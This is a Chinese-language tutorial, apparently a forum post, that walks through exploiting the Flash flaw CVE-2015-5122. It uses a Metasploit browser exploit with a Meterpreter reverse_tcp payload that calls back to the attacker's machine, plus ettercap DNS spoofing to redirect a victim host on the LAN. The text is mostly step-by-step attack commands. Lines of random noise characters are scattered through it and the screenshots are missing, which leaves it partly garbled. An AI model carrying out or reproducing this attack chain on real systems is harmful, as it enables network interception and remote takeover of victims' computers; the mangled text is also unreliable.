|
8 g7 s: L3 Y7 ^& I; {& z
二、cve2015-5122漏洞实例演示虚拟机
% q) e" {- _- n# ]' t( G4 o ! t* V) `% ^" P( m* M
^. s7 j3 O# f+ w/ `0 e) p
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
6 g! S: y( h$ w" @* \1 I- D
, d* ~5 S0 p$ }3 K C9 Y) U
9 ~5 ?% E+ M1 x8 T search cve-2015-5122如图:
W0 V) T' x5 d( m# j
4 r8 j$ s* g1 I* B/ I
5 h( F) ^% g0 V- k5 E N3 h% o. \4 R3 ` ; L. V" x6 c! ~ x; O( y2 C
- V( G4 ?% W. l, q# F- k( k. R% b3 }3 a
' M- O( R" a7 ~) z$ |: r
下面我们敲如下命令:
+ t3 s: d u' q; M: h% f ( R6 e4 v* W* B: o$ \1 t5 H, B
! H7 t% P- l6 B* p/ A' c use exploit/multi/browser/adobe_flash_opaque_background_uaf
7 H0 _4 X! o2 c4 Q1 @5 M
7 Z: O5 q+ c: G5 d+ A, ]8 I6 ~* s3 r F
" ]; E2 F# d+ ]$ q; _ set PAYLOAD windows/meterpreter/reverse_tcp 3 {0 s3 B- Z5 j) a" U, [) _
; ]# g0 u5 f7 m4 {* t
! [; l' B" W8 ]8 p8 V3 I set LHOST 192.168.0.109
8 L9 D8 b# ~- |
3 b" C/ t: ], |2 n% B2 |1 A4 k6 w: o
set URIPATH / /*根目录*/
" Y5 t$ r2 h4 k: P* x7 }& u
" s9 ^% R* S% x6 J/ j, c
A p9 Q, Q! Q0 [ _4 g% ` set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
3 \7 [2 {. l0 _2 N5 k0 y
' ]1 F+ \8 }: p! ]0 [; A
2 n1 q& i: i" y) e8 \; v }) N7 b2 p0 q set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 ^% O: `- M7 D0 P8 r' T4 _
4 X u1 v# _- S; v! J" D6 L& B+ |* U0 s3 A; W- s1 J- ?
然后show options如图:
2 s! H X ~+ ?3 Z/ g
( \8 c2 k5 y0 s$ [0 ]' V9 M8 x% U) z; w1 q
, ~% C0 i( z4 R# j6 n. G& g
* e; A- `' ~' |& p0 T! B" A2 A; S& Q6 T, R4 Y9 \. Y7 n3 s
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
7 K9 I1 U2 J, f6 ^8 w9 X- ~ 5 r9 @% V* A; T$ o5 A
& Q' g. n; Y: [0 n: p; x' E1 @
3 G9 Z/ d1 u2 ^8 U% |
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
7 ?7 U$ {3 w% S; s3 v
5 L3 Y( U, _8 ]* S( L+ D# g2 G, m! Q# ~9 f) T1 b1 d- Y
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 4 r$ v9 \3 n+ h2 c( a! g2 y* g
|/ {6 D/ M8 a# N* f, t
/ i# X( k! W) [- ~# B* o6 p $ _7 c+ I! ^% @* U4 N
6 f r2 m1 T' B, t5 c6 B4 W
! b$ c( ~- V$ E
成功了,这时候我们断开ettercap,如图: 8 @6 W0 Q; D: h. @4 n h: t$ o; A
* e! u; [# Y! {9 M9 p9 }: b6 g+ ?3 r
# W" R! i, n. w* N) [! p e9 I+ J # W- m8 U+ T5 A
5 ?" S" `8 \% Q Y% k
Screenshot如图: % u& _# O1 } a& d3 T# o/ l' v' d
i f; F% a( I8 c& t5 r9 K
( e3 [7 d4 c: w' v) D
, Z4 P5 v# Q/ R, A ! i. _/ G3 I6 l( p
3 V- N* H2 P. n' z2 y2 Q $ Q' M% W6 Q6 q% G/ _) v" I6 i
|